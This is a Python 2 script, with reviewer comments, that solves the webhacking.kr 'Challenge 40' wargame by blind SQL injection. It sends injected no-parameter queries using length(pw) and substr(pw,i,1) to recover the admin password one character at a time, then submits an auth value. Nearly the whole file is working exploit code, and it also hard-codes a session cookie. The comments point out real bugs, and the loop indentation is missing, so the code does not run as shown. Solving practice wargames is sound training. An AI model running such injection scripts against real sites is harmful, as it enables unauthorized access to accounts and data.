#-*- coding: utf-8 -*-
import sys
import urllib2
import CookieManager
# Blind SQL injection solver for the webhacking.kr "Challenge 40" wargame page.
# Three phases: (1) find the admin password length, (2) recover it one
# character at a time, (3) submit a fixed auth value and print the response.
# Written for Python 2 (print statements, urllib2, bare `print`); it does not
# run unchanged under Python 3. The indentation of the loop/try bodies below
# was lost when this file was captured and must be restored before it runs.
challengeUrl = "http://webhacking.kr/challenge/web/web-29/index.php"
# Marker string used as the true/false oracle: a response containing it is
# treated as "condition true". NOTE(review): this assumes the text appears
# only on the true branch of the page — confirm against the actual page.
trueCondition = "admin password"
print "[*] Find admin password length"
passwordLength = 0
isFoundPassword = False
# NOTE(review): a live session identifier is hard-coded and committed to
# source. Sessions expire, so this value goes stale, and committing it leaks
# an authenticated session; read it from an environment variable or argument
# instead. CookieManager is a project-local module not visible here.
CookieManager.addCookie("PHPSESSID", "0eb95c9c96a3a8bc908e5d828f22cc3b")
# Phase 1: try candidate lengths 1..19 (range upper bound is exclusive).
# %26 is the percent-encoding of '&', so the condition stays inside the
# `no` parameter instead of being split at a parameter separator.
for passwordLength in range(1, 20):
parameters = "?no=-1||no=2%26%26length(pw)=" + str(passwordLength) + "&id=0x61646d696e&pw=guest"
httpRequest = urllib2.Request(challengeUrl + parameters)
# The session cookie is attached by hand; urllib2 is not given a cookie jar.
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
print "[*] Blind SQL Injection...", passwordLength
# NOTE(review): str.find() returns -1 when absent and 0 when the marker
# sits at offset 0, so `> 0` misses a match at the very start of the
# response; the usual idiom is `!= -1`. The same comparison is repeated
# in phase 2.
if httpResponse.find(trueCondition) > 0:
print "[+] FIND IT! password length is [", passwordLength, "]"
isFoundPassword = True
break
# A bare except that only re-raises is a no-op; try/finally alone would
# close the connection. Left as-is here (documentation-only change).
except:
raise
finally:
# `is not None` is the idiomatic form; `!= None` behaves the same here.
if httpConnection != None:
httpConnection.close()
# If no length in 1..19 matched, passwordLength is left at 19 by the loop;
# exit non-zero rather than continue with a meaningless length.
if not isFoundPassword:
sys.exit(-1)
passwordValue = ""
print
print "[*] Find admin password"
# Phase 2: recover one character per position, 1..passwordLength (1-based,
# matching substr()). The trailing comma on the print below suppresses the
# newline (Python 2) so the progress dots continue on the same line.
for caretIndex in range(1, passwordLength+1):
print
print "[*] Blind SQL Injection...", caretIndex, "",
# Candidate characters are the byte values 0x5b..0x7a, i.e. '[' '\' ']' '^'
# '_' '`' and 'a'..'z'; nothing outside that range is ever tried.
# NOTE(review): a position with no match is silently skipped — no error,
# no placeholder — so passwordValue can end up shorter than passwordLength
# without any indication. NOTE(review): phase 1 sends id=0x61646d696e while
# this phase sends id=guest; unclear from here whether that is intentional.
for charIndex in range(0x5b, 0x7b):
sys.stdout.write(".")
parameters = "?no=-1||2%26%26substr(pw," + str(caretIndex) + ",1)=" + hex(charIndex) + "&id=guest&pw=guest"
httpRequest = urllib2.Request(challengeUrl+parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
# Same `> 0` off-by-one as in phase 1 (see note there).
if httpResponse.find(trueCondition) > 0:
print
print "[+] FIND IT!", chr(charIndex)
passwordValue += chr(charIndex)
break
except:
raise
finally:
if httpConnection != None:
httpConnection.close()
print "[+] Admin password is [", passwordValue, "]"
print
print "[*] Clear Challenge 40"
# Phase 3: the recovered passwordValue is only printed above; this request
# sends a fixed auth value and echoes whatever the page returns.
# NOTE(review): presumably the challenge's expected answer — confirm.
parameter = "?auth=luck_admin"
httpRequest = urllib2.Request(challengeUrl+parameter)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
print httpResponse
except:
raise
finally:
if httpConnection != None:
httpConnection.close()